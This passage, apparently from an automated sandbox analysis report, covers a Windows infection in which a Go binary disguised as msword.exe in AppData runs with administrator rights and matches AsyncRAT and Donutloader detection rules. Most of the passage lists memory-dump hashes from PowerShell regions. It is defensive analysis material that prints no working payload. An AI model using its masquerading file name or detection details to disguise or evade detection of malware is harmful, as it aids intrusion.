                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:29
                                                                                                      Start time:06:29:51
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:30
                                                                                                      Start time:06:29:55
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\msword.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\msword.exe
                                                                                                      Imagebase:0xcf0000
                                                                                                      File size:503'316'480 bytes
                                                                                                      MD5 hash:4CEEDA451C97AB9A9F299CBD8D60CB0F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Go lang
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001E.00000002.2872402033.0000017FD2FB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001E.00000002.2872006726.0000017FD2EB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001E.00000002.2866315495.0000000000DC9000.00000004.00000001.01000000.00000010.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 26%, Virustotal, Browse
                                                                                                      Has exited:false

                                                                                                      Reset < >
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (Xxq$LRsq$kf]o^
                                                                                                        • API String ID: 0-3235120475
                                                                                                        • Opcode ID: 1fd693e8c59969158aae016c9443e43a70079e2e1a65661ecff13e40a228fb0e
                                                                                                        • Instruction ID: f15b9694005b95cfb56fea0cba8c58fbf50f784b941bbfd17f7a5fc496f5ce5e
                                                                                                        • Opcode Fuzzy Hash: 1fd693e8c59969158aae016c9443e43a70079e2e1a65661ecff13e40a228fb0e
                                                                                                        • Instruction Fuzzy Hash: 2F825B74B00218CFDB14DB68D894BADBBB2BF89300F158599E845AB365CB35ED81CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-737313894
                                                                                                        • Opcode ID: a80aa77fff32b105042ded8cdb1cb9dfe071a6287d4262fa4616da1a40e2c693
                                                                                                        • Instruction ID: 89e1cfc38ba59d1321b5409e2444198a075d9af47edac5ea04eb104067edfd20
                                                                                                        • Opcode Fuzzy Hash: a80aa77fff32b105042ded8cdb1cb9dfe071a6287d4262fa4616da1a40e2c693
                                                                                                        • Instruction Fuzzy Hash: A0B134B5B0420AEFCB258B79884476EFBB2AFC6311F24906AD585CB291DF36C841C7D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPsq$tPsq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-3398959991
                                                                                                        • Opcode ID: c6c7be129ef60fb685c4f937c867b80d1115addf53ce5e26809e4801903c3382
                                                                                                        • Instruction ID: 3925fab8cc6a84e4d7297eba73089191991ea8a6fd1c834582e76407a1ecf0ad
                                                                                                        • Opcode Fuzzy Hash: c6c7be129ef60fb685c4f937c867b80d1115addf53ce5e26809e4801903c3382
                                                                                                        • Instruction Fuzzy Hash: E29126B1B042499FCB148B688440B6EFBE2AFC9311F14A0AAE8459F391DF32DC41C7E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPsq$$sq$$sq
                                                                                                        • API String ID: 0-1004055494
                                                                                                        • Opcode ID: ac54a1eea620d9d64b038c1099d0082c8a01a293a1137cae5d70eed9fe74d283
                                                                                                        • Instruction ID: 14f22eb6e19cadd5260735db7f477896f4ca67777d22f600810667c1ca622ea8
                                                                                                        • Opcode Fuzzy Hash: ac54a1eea620d9d64b038c1099d0082c8a01a293a1137cae5d70eed9fe74d283
                                                                                                        • Instruction Fuzzy Hash: 3B51A0B0B042499FCB148B58C544BADFBF2AF85311F19A09AD4459B2D1DB32DC51CBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPsq$tPsq
                                                                                                        • API String ID: 0-2620299843
                                                                                                        • Opcode ID: ffac73e0cd9a170e4b313a4e5a6ccf374ee04f511f24bd2aa529a295f9f8b74c
                                                                                                        • Instruction ID: ae2e76bf56c824e5149c0a212b1f1cd70beb3a47aa6d334eaed92dba3a0f44fd
                                                                                                        • Opcode Fuzzy Hash: ffac73e0cd9a170e4b313a4e5a6ccf374ee04f511f24bd2aa529a295f9f8b74c
                                                                                                        • Instruction Fuzzy Hash: 14512BB1B08255AFD7249BA9D8507BAFBE2AFC6210F18C06BD585CB281DA31DD51C3E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $
                                                                                                        • API String ID: 0-3993045852
                                                                                                        • Opcode ID: 9b15f94f686dffd495f75edfef70e76edacff3d165d753c59322328a77d3fe83
                                                                                                        • Instruction ID: 3c0235b34cc8b803c8dd91d80e1dcdffce3438e557322972fe21c495bddcb102
                                                                                                        • Opcode Fuzzy Hash: 9b15f94f686dffd495f75edfef70e76edacff3d165d753c59322328a77d3fe83
                                                                                                        • Instruction Fuzzy Hash: E021D4B4A046059FCB44DF98D884AAEFBB1FF48310B198599D959EB361C731EC81CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 402b7b98330d11933fbf01a0b17533bc032244357218c5d5a954c43fb083adf5
                                                                                                        • Instruction ID: 9296ef0e6e5a494e1713bed77043cca0d81f9e4cb772ebce719cee3ea13f63ed
                                                                                                        • Opcode Fuzzy Hash: 402b7b98330d11933fbf01a0b17533bc032244357218c5d5a954c43fb083adf5
                                                                                                        • Instruction Fuzzy Hash: E0521874A01259EFCB04CFA8D494A9DFBB2FF49314F288599E814AB361C735ED81CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c447bfbdc51fdbbaf30c618ad9b00afecd2fe74680f9341cf246d7bfd54ec42a
                                                                                                        • Instruction ID: bc3c40c85f540e408682734acb4d7adb7bbb2d7eb62d5c230c7e04508fc7c9f1
                                                                                                        • Opcode Fuzzy Hash: c447bfbdc51fdbbaf30c618ad9b00afecd2fe74680f9341cf246d7bfd54ec42a
                                                                                                        • Instruction Fuzzy Hash: 64D1E674A01219DFDB14CF98D484A9EFBB2FF49310F298599E845AB365C731ED82CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19c2040e91befbdaebfd85bcdb7abbe2cd529ce63f320bba82ba64307eb3b23c
                                                                                                        • Instruction ID: f9dc58d81265f3d7aa33747554c62a1ab7a4c73febc551d69bd15f4d7d0903a0
                                                                                                        • Opcode Fuzzy Hash: 19c2040e91befbdaebfd85bcdb7abbe2cd529ce63f320bba82ba64307eb3b23c
                                                                                                        • Instruction Fuzzy Hash: 97B18034A05244DFCB05CFA8D4949AEFBF6FF89314B1984AAE4059B362CB35ED45CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f13e3ad6828290d283e0c78321c9295a1937bc67c841852776c673602202430
                                                                                                        • Instruction ID: 6d69e214b7792c75963e8fd351f37b4abcb7ffdd564fbd13dca0a7088bd56bb7
                                                                                                        • Opcode Fuzzy Hash: 6f13e3ad6828290d283e0c78321c9295a1937bc67c841852776c673602202430
                                                                                                        • Instruction Fuzzy Hash: 52A1B274A002059FCB15CF9DD4949AEFBB2FF88310F2886A9D855AB365C771EC51CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8067b7246cae627f6163131a0ffdfae2d4da37ae3e86bbaba101f614f6b31e38
                                                                                                        • Instruction ID: a09329dda96064c4b2a42221fe26f0ddfb5363e29ed9907d80f5839104fe9b83
                                                                                                        • Opcode Fuzzy Hash: 8067b7246cae627f6163131a0ffdfae2d4da37ae3e86bbaba101f614f6b31e38
                                                                                                        • Instruction Fuzzy Hash: 7251D874A00208AFCB05CF98D494A9DFBF2FF88314F288559E405AB361C775ED82CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f43f4edff86e497eebaa2683a368d899719b2937963861cc5560ce28fa14e862
                                                                                                        • Instruction ID: 0676f55c1eb6fcca209d9c43bfc5e91f1cbe954ca10fcdafc2f7326cb2619d2c
                                                                                                        • Opcode Fuzzy Hash: f43f4edff86e497eebaa2683a368d899719b2937963861cc5560ce28fa14e862
                                                                                                        • Instruction Fuzzy Hash: 3B4106B4A005059FCB09CF59C4989AEFBB1FF48310F258699D916AB364C736FC91CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c60cd6db053219ac6c3e61c07476981754b7acc0d08ff374caf2302b6255ec3
                                                                                                        • Instruction ID: 0d248728bf45f3cd9ce3140ec5d72cd0eb86eb95b098dd85627417097d68674f
                                                                                                        • Opcode Fuzzy Hash: 6c60cd6db053219ac6c3e61c07476981754b7acc0d08ff374caf2302b6255ec3
                                                                                                        • Instruction Fuzzy Hash: 7B414CB1A092959FCB06DB5CC8A09AABFB0FF4A310B198096D455DB262C734AC45CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 919ff120a2df250ecebd937b9a735f10251302d92a8b81bd6dc258f2d127e9e9
                                                                                                        • Instruction ID: 677e2b3fc75460436002b8ec51d392289eb21731110f57b61d51f9def83fb6ba
                                                                                                        • Opcode Fuzzy Hash: 919ff120a2df250ecebd937b9a735f10251302d92a8b81bd6dc258f2d127e9e9
                                                                                                        • Instruction Fuzzy Hash: F82147F63003157BD7245AAA880077BF6D6AFC5715F20802AE549CB3C1DEB6DC8083A8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf6312ceb0edf225818082a8653a50246df71ce73756dc7494585f357361b0d2
                                                                                                        • Instruction ID: 6c06bcb4daa1436847c8341fd42d7ea0c8495c73b140fb02052d299e516ce4af
                                                                                                        • Opcode Fuzzy Hash: bf6312ceb0edf225818082a8653a50246df71ce73756dc7494585f357361b0d2
                                                                                                        • Instruction Fuzzy Hash: 6D216DF53083957FC72046BA481076ABFA6AFC6310F24805AE544CF2C2DAB9DC8083A9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 741cd23862c4c0ec732cb0b6b8e09a3807718f29aa9271fc7a68aecb35f9cc5d
                                                                                                        • Instruction ID: aefb65cc8db302e60cda583e780f0116210c532e7c8512d5b121d8f244ffce6b
                                                                                                        • Opcode Fuzzy Hash: 741cd23862c4c0ec732cb0b6b8e09a3807718f29aa9271fc7a68aecb35f9cc5d
                                                                                                        • Instruction Fuzzy Hash: E9210AB4A046199FCB50CF99C8809AEFBF5FF89310B198199D949EB355C731EC51CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bc1ac80cde3a5ed2f1be1f5294b64d51ed25e43de57c6df31558f7dc23fa77ae
                                                                                                        • Instruction ID: 34ca8cdc5b8ad1b0c456d40da511ffbb4da97052cf5b37a282eb24e97bfeb72a
                                                                                                        • Opcode Fuzzy Hash: bc1ac80cde3a5ed2f1be1f5294b64d51ed25e43de57c6df31558f7dc23fa77ae
                                                                                                        • Instruction Fuzzy Hash: 1C21D5B4A005199FCB04CF89C9809AEFBB5FF8C310B248159E909E7361C731EC51CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee543817f8dcaf029c4a03bfde4a569bbe5658fa531f2e5c7f8837b90e1c221d
                                                                                                        • Instruction ID: 87b7350317acf2f916b775978ba80b2273c1e80d57a8936f04900b1033f0d51b
                                                                                                        • Opcode Fuzzy Hash: ee543817f8dcaf029c4a03bfde4a569bbe5658fa531f2e5c7f8837b90e1c221d
                                                                                                        • Instruction Fuzzy Hash: 2E11E9B4A002099FCB00DF99D8809AEFBF5FF8D310B148559D909AB351C731ED41CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bd9e746c0d32b4ca5bc9eed9a86d5029e628784e94d5b4df9dbcc40b6df699f4
                                                                                                        • Instruction ID: 0804148a1e6542d60cbdc06a1470092d0042b97bf2d01f07f0f52e265bbf85bf
                                                                                                        • Opcode Fuzzy Hash: bd9e746c0d32b4ca5bc9eed9a86d5029e628784e94d5b4df9dbcc40b6df699f4
                                                                                                        • Instruction Fuzzy Hash: 4111E674A00208EFDB45CFA8D484A9DFBF2FF48314F288559E404AB361CB71A882CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0fc7fc534e24d6d245766be34b5b5210347ce81db225115eeab53c2ff6b43f35
                                                                                                        • Instruction ID: 7ed233b69d0fb5a47b5dd10eecd326e2c58003d46f2d6999eb4602edc6466650
                                                                                                        • Opcode Fuzzy Hash: 0fc7fc534e24d6d245766be34b5b5210347ce81db225115eeab53c2ff6b43f35
                                                                                                        • Instruction Fuzzy Hash: 9901F4B62083A56BC7128A999440BE1FFB48FC3164B198097E445CB2D3D236C99AC7F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1661729024.000000000343D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0343D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_343d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f103836eb3b197a8c81f31fee1988e3776ad2bcd603976ac29632af90c74182
                                                                                                        • Instruction ID: 049563be8139026050a97b3e4b27239fce0f851ecf14b9550a789e0e951b49b4
                                                                                                        • Opcode Fuzzy Hash: 6f103836eb3b197a8c81f31fee1988e3776ad2bcd603976ac29632af90c74182
                                                                                                        • Instruction Fuzzy Hash: 76012D7240E3C05ED7128B258894B52BFB8DF57628F1D81DBD9888F2A3C2695849C772
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1661729024.000000000343D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0343D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_343d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4dee1deba2af11f4fda6dd8d2054fbdbe89a20e28e8e1d169771479231c47ac9
                                                                                                        • Instruction ID: b8fd0ab0176dc9c88f0ecf145c79b00131d70531bb95f2b8544675d1d240507f
                                                                                                        • Opcode Fuzzy Hash: 4dee1deba2af11f4fda6dd8d2054fbdbe89a20e28e8e1d169771479231c47ac9
                                                                                                        • Instruction Fuzzy Hash: 1301D4718093009AE7108A25CCC0BA7FFA8DB47B28F1CC45BED595F242C6789842C6B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 644da98fd845d8438c23f61e8374cb56d935c3149cf7b12ec1e6fb6a15c7de53
                                                                                                        • Instruction ID: fa047601fbcec21e11d813c19c61c8224e4d941533dccbb7e2a71f05ac333b04
                                                                                                        • Opcode Fuzzy Hash: 644da98fd845d8438c23f61e8374cb56d935c3149cf7b12ec1e6fb6a15c7de53
                                                                                                        • Instruction Fuzzy Hash: B0E0C9B9D092499FCB54DFBA95421FEFFF5AA48205F00896FD969E3300E63546018FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0c73705f6bc97206f99bc2c8f00513a7c5875625cd22a941204c57abaab9e09
                                                                                                        • Instruction ID: 714288a9947c99f4aa45442ff95529dcb55e4b5d25792fd7f4ff9a3967a992f2
                                                                                                        • Opcode Fuzzy Hash: f0c73705f6bc97206f99bc2c8f00513a7c5875625cd22a941204c57abaab9e09
                                                                                                        • Instruction Fuzzy Hash: 85E026B4E0924E9F8F48DFB995421BEFBF5AB48200F1089BE9929E3340E63556118F95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1662869056.0000000003560000.00000040.00000800.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 87d074c1d7f6627dcf61236a060dba33675d09f42c556d8b666da79690baee99
                                                                                                        • Instruction ID: 3fdf572dd2038a587fa9a0f0525ebff53335c5628928854532d2df8a7234294d
                                                                                                        • Opcode Fuzzy Hash: 87d074c1d7f6627dcf61236a060dba33675d09f42c556d8b666da79690baee99
                                                                                                        • Instruction Fuzzy Hash: 31D0A73044CB889FD7235795B10D2B03FA4BB06100F0800D2F19487073C26A68548752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $sq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-3087168343
                                                                                                        • Opcode ID: 5b2433e65e85d1720e9b6dc4bf684574ffe1dc71a1f3be36e4209c95f408b83c
                                                                                                        • Instruction ID: 81bcba365f66f42af30870dc0393a975c6c3469e1865591af8cca5f2b5df008a
                                                                                                        • Opcode Fuzzy Hash: 5b2433e65e85d1720e9b6dc4bf684574ffe1dc71a1f3be36e4209c95f408b83c
                                                                                                        • Instruction Fuzzy Hash: 94516CB670424A9FC7219AB9944076EFBE6EFC6311B18907FD585CB282DA32C845C7F1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2855845837
                                                                                                        • Opcode ID: e1c74383c2f56ce90ebe75512c6117fd0e5318625ebc023d71fa3789f99e4580
                                                                                                        • Instruction ID: 0ea92a9e46f4568722ef617bdf78b6bfc8c0bd1ff43778b2531360c4b888fa87
                                                                                                        • Opcode Fuzzy Hash: e1c74383c2f56ce90ebe75512c6117fd0e5318625ebc023d71fa3789f99e4580
                                                                                                        • Instruction Fuzzy Hash: 0621E5F1A0834AAFEB214F65944076DFBB1AF86310F1C61ABC44497182E636C944C7E2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1670313489.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$$sq$$sq
                                                                                                        • API String ID: 0-148891389
                                                                                                        • Opcode ID: 3967d51a39fc9dd77e16049240f49d46d8e4b730d85d3fd72d23557637fbbcb0
                                                                                                        • Instruction ID: 4888999802f19b73daa4862226ec67b14f8e6987f1563ba9ac6baf05e8ec461c
                                                                                                        • Opcode Fuzzy Hash: 3967d51a39fc9dd77e16049240f49d46d8e4b730d85d3fd72d23557637fbbcb0
